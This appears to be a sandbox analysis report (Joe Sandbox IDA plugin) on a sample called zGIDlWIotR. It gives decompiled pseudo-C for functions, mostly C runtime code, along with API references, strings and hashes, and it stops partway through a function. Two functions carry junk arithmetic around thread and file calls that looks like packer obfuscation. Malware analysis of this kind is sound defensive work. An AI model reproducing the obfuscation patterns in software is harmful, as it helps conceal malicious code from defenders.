0x0039010b
0x0039010b
0x0039010d
0x00390113
0x00390115
0x00390117
0x0039011d
0x00390122
0x00390125
0x00390128
0x00390131
0x00390134
0x00390137
0x0039013d
0x00390140
0x00390146
0x0039014b
0x00390154
0x00390164
0x00390169
0x00390170
0x00390170
0x0039017d
0x00390183
0x0039018a
0x0039018f
0x00390194
0x00390197
0x00390199
0x003902f8
0x00390301
0x00390306
0x0039030c
0x0039030d
0x00390315
0x00390315
0x00000000
0x0039031b
0x0039019f
0x003901a0
0x003901ba
0x003901bc
0x003901d3
0x003901df
0x003901ec
0x003901f2
0x003901fc
0x003901ff
0x00390203
0x00390203
0x00390205
0x00390208
0x00390209
0x00390210
0x00390215
0x00390215
0x0039021b
0x0039021e
0x00390220
0x00390220
0x00390222
0x00390223
0x0039022c
0x0039022e
0x00390230
0x00390230
0x00390233
0x00390234
0x00390234
0x0039023a
0x00390244
0x00390246
0x0039024d
0x00390260
0x00390269
0x00390275
0x00390281
0x00390288
0x0039028d
0x0039029e
0x003902a4
0x003902b7
0x003902bf
0x003902e0
0x003902e5
0x003902ea
0x003902ef
0x003902f2
0x003902f3
0x003902f4
0x003902f6
0x00000000
0x00000000
0x00000000
0x003902f6
0x00390324

APIs

GetModuleFileNameA.KERNEL32(00000000,003D0858,00000104), ref: 003901BC
_memset.LIBCMT ref: 00390275
GetTickCount.KERNEL32 ref: 003902AB

Part of subcall function 0038F190: __itow.LIBCMT ref: 0038F1D8

Part of subcall function 00396570: _memset.LIBCMT ref: 00396593
Part of subcall function 00396570: _free.LIBCMT ref: 00396599

Part of subcall function 0038CF90: _malloc.LIBCMT ref: 0038CFC7

Part of subcall function 0039D699: __fsopen.LIBCMT ref: 0039D6A6

_vfwprintf.LIBCMT ref: 00390301

Part of subcall function 0039D580: _vfprintf_helper.LIBCMT ref: 0039D595

Part of subcall function 0039D3B9: _flsall.LIBCMT ref: 0039D3CD

ReleaseMutex.KERNEL32(0000048C), ref: 0039031B

Strings

(9|', xrefs: 00390154, 00390170

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: _memset$CountFileModuleMutexNameReleaseTick__fsopen__itow_flsall_free_malloc_vfprintf_helper_vfwprintf
String ID: (9|'
API String ID: 3440257774-1240991043
Opcode ID: c39a0b8ac59f681c97ade2bb2d3ae0717373a7d40bad03b160b35d27fad93a8c
Instruction ID: bd7671ca5aae2164effce7036368d8351dcbdd633d04179a92654bff475d9ce9
Opcode Fuzzy Hash: c39a0b8ac59f681c97ade2bb2d3ae0717373a7d40bad03b160b35d27fad93a8c
Instruction Fuzzy Hash: 22514770900205DBDB0BAFB1FD4AF6A3BBCFB48B00F114455E941EB2A1EB716920CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003848F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E003848F0(void* __ecx, signed long long __fp0, _Unknown_base(*)()* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed long long _v12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t32;
				signed int _t33;
				void* _t37;
				signed long long _t42;

				_t13 =  *0x3ce280; // 0xa4969772
				_v8 = _t13 + 0x3101df53;
				asm("fild dword [ebp-0x4]");
				_t37 = __ecx;
				_v12 = __fp0;
				_t42 =  *0x3ce3f8 + _v12;
				 *0x3ce3f8 = _t42;
				 *0x3ce280 =  *0x3ce280 + 1;
				 *((intOrPtr*)(__ecx + 4)) = _a8;
				 *0x3ce018 =  *0x3ce018 + 1;
				_t15 =  *0x3ce018; // 0xa1fe
				_a8 = _t15 - 0x31931e85;
				asm("fild dword [ebp+0xc]");
				_v12 = _t42;
				asm("fsubr qword [ebp-0x8]");
				 *0x3ce324 =  *0x3ce520;
				asm("fld1");
				asm("fsubp st1, st0");
				 *((intOrPtr*)(__ecx + 8)) = _a12;
				_t32 =  *0x3ce5b4; // 0x1cd4718b
				_t33 =  *0x3ce34c; // 0xc60d09f3
				 *0x3ce34c = _t33 * (0x5256d8c - _t32);
				 *_t37 = CreateEventA(0, 1, 0, 0);
				CloseHandle(CreateThread(0, 0, _a4, _t37, 0, 0));
				WaitForSingleObject( *_t37, 0xffffffff);
				CloseHandle( *_t37);
				 *0x3ce1b0 =  *0x3ce1b0 -  *0x3c75c8;
				_v12 =  *0x3ce1b0 -  *0x3c7750;
				 *0x3ce044 =  *0x3ce044 * _v12;
				return _t37;
			}

0x003848f6
0x00384903
0x00384906
0x0038490a
0x00384911
0x0038491e
0x00384924
0x0038492a
0x00384930
0x00384933
0x0038493a
0x0038494c
0x0038494f
0x00384952
0x0038495b
0x0038495e
0x0038496a
0x0038496c
0x00384974
0x00384977
0x00384984
0x0038498d
0x0038499d
0x003849af
0x003849ba
0x003849c3
0x003849d8
0x003849ea
0x003849f6
0x003849ff

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00384993
CreateThread.KERNEL32 ref: 003849A8
CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 003849AF
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000), ref: 003849BA
CloseHandle.KERNEL32(?,?,000000FF,?,00000000,00000000), ref: 003849C3

Strings

7i\, xrefs: 0038495E

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: CloseCreateHandle$EventObjectSingleThreadWait
String ID: 7i\
API String ID: 1404307249-1329047267
Opcode ID: a220aeb7ca40eda9450e8a09315a7906b00369587bbb9548ec65dbd93e14a039
Instruction ID: 6613a100d34d7cf0b86baa14956ecab46ccfcd342c4a937320cc144c4ca800b3
Opcode Fuzzy Hash: a220aeb7ca40eda9450e8a09315a7906b00369587bbb9548ec65dbd93e14a039
Instruction Fuzzy Hash: A6318C76601208EFD7169F64FC88F997FB8FB88710F11895AE984D62A4DB30B560CB44

Uniqueness

Uniqueness Score: -1.00%

Function 003BC1A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E003BC1A2(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x3d09e0, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x3d1014 - _t7;
								if(__eflags == 0) {
									_t9 = E0039FA66(__eflags);
									 *_t9 = E0039FA24(GetLastError());
									goto L17;
								} else {
									__eflags = E0039FDDD(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E0039FA66(__eflags);
										 *_t12 = E0039FA24(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0039FDDD(_t6, _t30);
						 *((intOrPtr*)(E0039FA66(__eflags))) = 0xc;
						goto L12;
					} else {
						E0039CB4B(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0039CBC4(__edx, __edi, __esi, _a8);
				}
			}

0x003bc1ab
0x003bc1b8
0x003bc1b9
0x003bc1bc
0x003bc1be
0x003bc1cd
0x003bc200
0x003bc200
0x003bc203
0x00000000
0x00000000
0x003bc1d0
0x003bc1d2
0x003bc1d4
0x003bc1d4
0x003bc1d4
0x003bc1e1
0x003bc1e7
0x003bc1e9
0x003bc1eb
0x003bc24b
0x003bc24b
0x003bc1ed
0x003bc1ed
0x003bc1f3
0x003bc235
0x003bc249
0x00000000
0x003bc1f5
0x003bc1fc
0x003bc1fe
0x003bc21d
0x003bc231
0x003bc217
0x003bc217
0x003bc217
0x00000000
0x00000000
0x00000000
0x003bc1fe
0x003bc1f3
0x00000000
0x003bc219
0x003bc206
0x003bc211
0x00000000
0x003bc1c0
0x003bc1c3
0x003bc1c9
0x003bc1c9
0x003bc21a
0x003bc21c
0x003bc1ad
0x003bc1b7
0x003bc1b7

APIs

_malloc.LIBCMT ref: 003BC1B0

Part of subcall function 0039CBC4: __FF_MSGBANNER.LIBCMT ref: 0039CBDD
Part of subcall function 0039CBC4: __NMSG_WRITE.LIBCMT ref: 0039CBE4
Part of subcall function 0039CBC4: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003B1B2D,00000000,00000001,00000000,?,003A2770,00000018,003CBCE0,0000000C,003A2800), ref: 0039CC09

_free.LIBCMT ref: 003BC1C3

Strings

I,<, xrefs: 003BC1A4

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID: I,<
API String ID: 1020059152-2522118260
Opcode ID: 862ed345510db0cbe86b13883e5e2a675c241a5e61ba125b9afc57437634bcda
Instruction ID: 31207f4920f14010c5ef94128fe7e2caa56d8b4a3bd5e9e1e95d553327271525
Opcode Fuzzy Hash: 862ed345510db0cbe86b13883e5e2a675c241a5e61ba125b9afc57437634bcda
Instruction Fuzzy Hash: 80119133561511AFCF337BB8EC06AD93B98AF447A4F215435FA49DE952EB34CD408AA0

Uniqueness

Uniqueness Score: -1.00%

Function 003B60FA Relevance: 10.6, APIs: 7, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E003B60FA(void* __ebx, void* __edi, void* __esi, void* __eflags, LONG** _a4) {
				signed int _v8;
				void* _t10;
				LONG* _t13;
				LONG* _t18;
				LONG** _t33;

				_t24 = __ebx;
				_push(8);
				_push(0x3cc160);
				_t10 = E003A29D0(__ebx, __edi, __esi);
				_t33 = _a4;
				if(_t33 != 0) {
					E003A27E5(__ebx, 0xd);
					_v8 = _v8 & 0x00000000;
					_t13 = _t33[1];
					if(_t13 != 0 && InterlockedDecrement(_t13) == 0) {
						_t22 = _t33[1];
						if(_t33[1] != 0x3ced90) {
							E0039CB4B(_t22);
						}
					}
					_v8 = 0xfffffffe;
					E003B60E5();
					if( *_t33 != 0) {
						E003A27E5(_t24, 0xc);
						_v8 = 1;
						E003B075E( *_t33);
						_t18 =  *_t33;
						if(_t18 != 0 &&  *_t18 == 0 && _t18 != 0x3cf420) {
							E003B07F7(_t18);
						}
						_v8 = 0xfffffffe;
						E003B60F1();
					}
					 *_t33 = 0xbaadf00d;
					_t33[1] = 0xbaadf00d;
					_t10 = E0039CB4B(_t33);
				}
				return E003A2A15(_t10);
			}

0x003b60fa
0x003b6038
0x003b603a
0x003b603f
0x003b6044
0x003b6049
0x003b6051
0x003b6057
0x003b605b
0x003b6060
0x003b606d
0x003b6075
0x003b6078
0x003b607d
0x003b6075
0x003b607e
0x003b6085
0x003b608d
0x003b6091
0x003b6097
0x003b60a0
0x003b60a6
0x003b60aa
0x003b60b9
0x003b60be
0x003b60bf
0x003b60c6
0x003b60c6
0x003b60d0
0x003b60d2
0x003b60d6
0x003b60db
0x003b60e1

APIs

__lock.LIBCMT ref: 003B6051

Part of subcall function 003A27E5: __mtinitlocknum.LIBCMT ref: 003A27FB
Part of subcall function 003A27E5: __amsg_exit.LIBCMT ref: 003A2807
Part of subcall function 003A27E5: EnterCriticalSection.KERNEL32(00000000,00000000,?,0039FF0F,0000000D), ref: 003A280F

InterlockedDecrement.KERNEL32(00000000), ref: 003B6063
_free.LIBCMT ref: 003B6078

Part of subcall function 0039CB4B: HeapFree.KERNEL32(00000000,00000000,?,00399D4C,00000000,?,0038EC86,?,3CE1F80E,?,0038126E,0038126E,?,00397F97,00000001,8B66003D), ref: 0039CB61

__lock.LIBCMT ref: 003B6091
___removelocaleref.LIBCMT ref: 003B60A0
___freetlocinfo.LIBCMT ref: 003B60B9
_free.LIBCMT ref: 003B60D6

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: __lock_free$CriticalDecrementEnterFreeHeapInterlockedSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 4191041622-0
Opcode ID: ed43a368170cd88ee1133b85e97e156fab6f1e88d1e5b8ae9ada46e74e062e09
Instruction ID: 8506ccecba5afbce5e8fc05a34a317c3d08f2523d402f8343cb6a4bf06bd0abe
Opcode Fuzzy Hash: ed43a368170cd88ee1133b85e97e156fab6f1e88d1e5b8ae9ada46e74e062e09
Instruction Fuzzy Hash: 9411A3315097049ADB377B699847B9EB7A49F00728F24441DF658DB9C3CF79DD808611

Uniqueness

Uniqueness Score: -1.00%

Function 003ABF3E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 60%

			E003ABF3E(intOrPtr* _a4) {
				signed int _v8;
				char _v12;
				char _v20;
				char _v28;
				intOrPtr* _t13;
				intOrPtr _t14;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;
				char* _t29;
				void* _t34;

				_t13 =  *0x3d12d0; // 0x0
				_t14 =  *_t13;
				if(_t14 == 0) {
					_push(0x29);
					_push(_a4);
					_t29 = E003AB6DD(E003AB4D8( &_v20, " throw("),  &_v28, 1);
					goto L5;
				} else {
					if(_t14 != 0x5a) {
						_t21 = E003ABE5E(_t26, _t34,  &_v20);
						E003AB920(E003AB4D8( &_v28, " throw("),  &_v12, _t21);
						_push(0x29);
						_push(_a4);
						_t29 =  &_v12;
						L5:
						E003ABBE4(_t29);
						return _a4;
					} else {
						 *0x3d12d0 =  *0x3d12d0 + 1;
						_t25 = _a4;
						 *_t25 = 0;
						 *(_t25 + 4) = _v8 & 0xffff0000;
						return _t25;
					}
				}
			}

0x003abf43
0x003abf48
0x003abf4f
0x003abf9d
0x003abf9f
0x003abfbc
0x00000000
0x003abf51
0x003abf53
0x003abf74
0x003abf8e
0x003abf93
0x003abf95
0x003abf98
0x003abfbe
0x003abfbe
0x003abfc7
0x003abf55
0x003abf55
0x003abf5e
0x003abf69
0x003abf6b
0x003abf6f
0x003abf6f
0x003abf53

APIs

DName::DName.LIBCMT ref: 003ABF87
DName::operator+.LIBCMT ref: 003ABF8E
DName::DName.LIBCMT ref: 003ABFB0
DName::operator+.LIBCMT ref: 003ABFB7
DName::operator+.LIBCMT ref: 003ABFBE

Strings

throw(, xrefs: 003ABF7F, 003ABFA8

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: 7029695a208604ef329da0448f0e745f03d521a6bcae80fed1e884dda120330d
Instruction ID: 04d122b8a7aa94309e0e8644fa6dbf23f3b3efc71703ef40574df789aa632a30
Opcode Fuzzy Hash: 7029695a208604ef329da0448f0e745f03d521a6bcae80fed1e884dda120330d
Instruction Fuzzy Hash: 0E01963460020CAFCF06DBA4EC56EFDBBB5EB45344F044055F501AF2A6DB70E9458B80

Uniqueness

Uniqueness Score: -1.00%

Function 0039FEC5 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E0039FEC5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t40;
				void* _t41;

				_t31 = __ebx;
				_push(8);
				_push(0x3cbbb0);
				E003A29D0(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t40 =  *((intOrPtr*)(_t41 + 8));
				 *((intOrPtr*)(_t40 + 0x5c)) = 0x3c9278;
				 *(_t40 + 8) =  *(_t40 + 8) & 0x00000000;
				 *((intOrPtr*)(_t40 + 0x14)) = 1;
				 *((intOrPtr*)(_t40 + 0x70)) = 1;
				 *((char*)(_t40 + 0xc8)) = 0x43;
				 *((char*)(_t40 + 0x14b)) = 0x43;
				 *(_t40 + 0x68) = 0x3ced90;
				E003A27E5(__ebx, 0xd);
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				InterlockedIncrement( *(_t40 + 0x68));
				 *(_t41 - 4) = 0xfffffffe;
				E0039FF67();
				E003A27E5(_t31, 0xc);
				 *(_t41 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t41 + 0xc));
				 *((intOrPtr*)(_t40 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x3cf4f8; // 0x3cf420
					 *((intOrPtr*)(_t40 + 0x6c)) = _t30;
				}
				E003B06CF( *((intOrPtr*)(_t40 + 0x6c)));
				 *(_t41 - 4) = 0xfffffffe;
				return E003A2A15(E0039FF70());
			}

0x0039fec5
0x0039fec5
0x0039fec7
0x0039fecc
0x0039fed6
0x0039fedc
0x0039fedf
0x0039fee6
0x0039feed
0x0039fef0
0x0039fef3
0x0039fefa
0x0039ff01
0x0039ff0a
0x0039ff10
0x0039ff17
0x0039ff1d
0x0039ff24
0x0039ff2b
0x0039ff31
0x0039ff34
0x0039ff37
0x0039ff3c
0x0039ff3e
0x0039ff43
0x0039ff43
0x0039ff49
0x0039ff4f
0x0039ff60

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,003CBBB0,00000008,0039FFCD,00000000,00000000,?,00399D4C,00000000,?,0038EC86,?,3CE1F80E,?,0038126E,0038126E), ref: 0039FED6
__lock.LIBCMT ref: 0039FF0A

Part of subcall function 003A27E5: __mtinitlocknum.LIBCMT ref: 003A27FB
Part of subcall function 003A27E5: __amsg_exit.LIBCMT ref: 003A2807
Part of subcall function 003A27E5: EnterCriticalSection.KERNEL32(00000000,00000000,?,0039FF0F,0000000D), ref: 003A280F

InterlockedIncrement.KERNEL32(?), ref: 0039FF17
__lock.LIBCMT ref: 0039FF2B
___addlocaleref.LIBCMT ref: 0039FF49

Strings

KERNEL32.DLL, xrefs: 0039FED1

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 122446f1c815e5e4066d48d8ab6a50a51093c2d3c30f2ebd18abf8a91eb4300a
Instruction ID: d9bff4640703e9410ed10efc61db4b3fbc1531bea70ba51ed7c8e806bf0db933
Opcode Fuzzy Hash: 122446f1c815e5e4066d48d8ab6a50a51093c2d3c30f2ebd18abf8a91eb4300a
Instruction Fuzzy Hash: 24018871400B049FD722AF69D84974AFBF0EF41314F10854EE4D6DB6A1CBB4AA44CB14

Uniqueness

Uniqueness Score: -1.00%

Function 003BD0DA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E003BD0DA(void* __edx, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				void* __ebp;
				void* _t16;
				intOrPtr* _t19;
				void* _t23;
				void* _t24;
				void* _t25;

				_t26 = __esi;
				_t24 = __edx;
				_t31 =  *((intOrPtr*)( *_a4)) - 0xe0434352;
				if( *((intOrPtr*)( *_a4)) == 0xe0434352) {
					L8:
					__eflags =  *((intOrPtr*)(E0039FFF2(_t23, _t25, __eflags) + 0x90));
					if(__eflags > 0) {
						_t16 = E0039FFF2(_t23, _t25, __eflags);
						_t9 = _t16 + 0x90;
						 *_t9 =  *((intOrPtr*)(_t16 + 0x90)) - 1;
						__eflags =  *_t9;
					}
					goto L10;
				} else {
					__eflags = __eax - 0xe0434f4d;
					if(__eflags == 0) {
						goto L8;
					} else {
						__eflags = __eax - 0xe06d7363;
						if(__eflags != 0) {
							L10:
							__eflags = 0;
							return 0;
						} else {
							 *(E0039FFF2(__ebx, __edi, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
							_push(8);
							_push(0x3cbd40);
							E003A29D0(_t23, _t25, __esi);
							_t19 =  *((intOrPtr*)(E0039FFF2(_t23, _t25, _t31) + 0x78));
							if(_t19 != 0) {
								_v8 = _v8 & 0x00000000;
								 *_t19();
								_v8 = 0xfffffffe;
							}
							return E003A2A15(E003B5483(_t23, _t24, _t25, _t26));
						}
					}
				}
			}

0x003bd0da
0x003bd0da
0x003bd0e6
0x003bd0eb
0x003bd10c
0x003bd111
0x003bd118
0x003bd11a
0x003bd11f
0x003bd11f
0x003bd11f
0x003bd11f
0x00000000
0x003bd0ed
0x003bd0ed
0x003bd0f2
0x00000000
0x003bd0f4
0x003bd0f4
0x003bd0f9
0x003bd125
0x003bd125
0x003bd128
0x003bd0fb
0x003bd100
0x003a6a0d
0x003a6a0f
0x003a6a14
0x003a6a1e
0x003a6a23
0x003a6a25
0x003a6a29
0x003a6a34
0x003a6a34
0x003a6a45
0x003a6a45
0x003bd0f9
0x003bd0f2

APIs

__getptd.LIBCMT ref: 003BD0FB

Part of subcall function 0039FFF2: __getptd_noexit.LIBCMT ref: 0039FFF5
Part of subcall function 0039FFF2: __amsg_exit.LIBCMT ref: 003A0002

__getptd.LIBCMT ref: 003BD10C
__getptd.LIBCMT ref: 003BD11A

Strings

MOC, xrefs: 003BD0ED
RCC, xrefs: 003BD0E6
csm, xrefs: 003BD0F4

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 4efd117a2bb20633e3ebd985ca205b36a1f5ca14201dc0e3b50d75099c35da33
Instruction ID: 1c85d8e2ccb5ed047d0ad3d5ccaef6d4043beebe09dc336b7e030cd0f50eb743
Opcode Fuzzy Hash: 4efd117a2bb20633e3ebd985ca205b36a1f5ca14201dc0e3b50d75099c35da33
Instruction Fuzzy Hash: 51E012355101048EDB11AB68C08A7A83795EB45318F6A40B1E60ECB622D738D8508A42

Uniqueness

Uniqueness Score: -1.00%

Function 0038BC40 Relevance: 9.2, APIs: 6, Instructions: 245
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0038BC40(CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				long long _v12;
				signed int _v16;
				long long _v20;
				long _v24;
				void _v20508;
				signed char _t54;
				signed int _t55;
				void* _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				intOrPtr _t64;
				long long _t69;
				intOrPtr _t73;
				signed int _t79;
				intOrPtr _t88;
				signed int _t89;
				void* _t91;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t97;
				signed int _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t101;
				intOrPtr _t112;
				long long _t115;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				intOrPtr _t127;
				void* _t129;
				void* _t130;
				intOrPtr _t153;
				long long _t168;
				long long _t171;

				E0039CCA0(0x5018);
				 *0x3ce0e8 = E0039CABC();
				_t126 = _t125 | 0xffffffff;
				 *0x3ce51c =  *0x3ce51c + _t126;
				_v12 =  *0x3ce250 -  *0x3c7e40;
				_t54 =  *0x3ce51c; // 0xaae
				_v16 = _t54;
				_v12 =  *0x3ce170 + _v12;
				asm("fild dword [ebp-0xc]");
				asm("fcomp qword [ebp-0x8]");
				asm("fnstsw ax");
				_t133 = _t54 & 0x00000041;
				if((_t54 & 0x00000041) != 0) {
					_v20 =  *0x3ce540 +  *0x3c7e38 +  *0x3c7e34;
					_v12 =  *0x3ce25c;
					asm("fsubr qword [ebp-0x8]");
					asm("fcomp qword [ebp-0x10]");
					asm("fnstsw ax");
					_t151 =  *0x3ce540;
					asm("fld1");
					asm("faddp st1, st0");
					 *0x3ce540 = _t151;
					__eflags = _t54 & 0x00000041;
					if(__eflags == 0) {
						_t123 =  *0x3ce498; // 0x3a4fa324
						_v16 = _t123;
						asm("fild dword [ebp-0xc]");
						_v12 = _t151;
						asm("fsubr qword [ebp-0x8]");
						_v12 =  *0x3ce210;
						_v12 =  *0x3ce528 + _v12;
						_t151 =  *0x3ce044 + _v12;
						 *0x3ce044 = _t151;
						 *0x3ce498 =  *0x3ce498 + 1;
						__eflags =  *0x3ce498;
					}
				} else {
					_t168 =  *0x3ce0a0;
					asm("fld1");
					asm("fsubp st1, st0");
					 *0x3ce0a0 = _t168;
					_t124 =  *0x3ce350; // 0xdea3a412
					_v16 = _t124;
					asm("fild dword [ebp-0xc]");
					_v12 = _t168;
					_t89 =  *0x3ce238; // 0xa35f
					_v16 = _t89;
					_t171 =  *0x3ce0a0 + _v12 -  *0x3c7e3c;
					_v12 = _t171;
					asm("fild dword [ebp-0xc]");
					_t151 = _t171 + _v12;
					 *0x3ce238 = E0039CABC();
				}
				_t55 =  *0x3ce478; // 0x80000000
				_t128 = _a8;
				_v16 = _t55;
				asm("fild dword [ebp-0xc]");
				 *0x3ce3a0 = _t151;
				E0038CB90(_a8, _t133);
				_t94 =  *0x3d0284; // 0x490
				E0038F090(_t151, _t94);
				_t130 = _t129 + 4;
				_t58 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0);
				 *0x3ce4e8 =  *0x3ce4e8 + _t126;
				_t91 = _t58;
				_t59 =  *0x3ce4e8; // 0x6bb26d6e
				_t95 =  *0x3ce0fc; // 0xe5101c30
				_t112 =  *0x3ce588; // 0xb5d5
				 *0x3ce0fc =  *0x3ce0fc + _t126;
				if(_t59 + _t95 != 0x72c3eb08 - _t112) {
					_t151 =  *0x3ce110;
					_t88 =  *0x3ce5dc; // 0x12a4
					_v16 = _t88 - 0x192e1244;
					asm("fild dword [ebp-0xc]");
